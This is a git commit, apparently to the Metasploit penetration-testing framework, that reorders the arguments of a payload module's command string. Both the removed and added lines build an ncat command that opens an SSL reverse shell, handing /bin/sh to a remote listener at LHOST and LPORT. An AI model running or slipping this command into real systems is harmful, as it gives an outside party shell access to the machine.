fix argument arrangement

bug/bundler_fix
C_Sto 2017-05-02 00:39:00 +08:00
parent 5a2afbc364
commit 9e06c3f07e
1 changed files with 1 additions and 1 deletions

View File

@ -45,7 +45,7 @@ module MetasploitModule
# Returns the command string to use for execution
#
def command_string
"ncat --ssl #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
"ncat -e /bin/sh --ssl #{datastore['LHOST']} #{datastore['LPORT']}"
end
end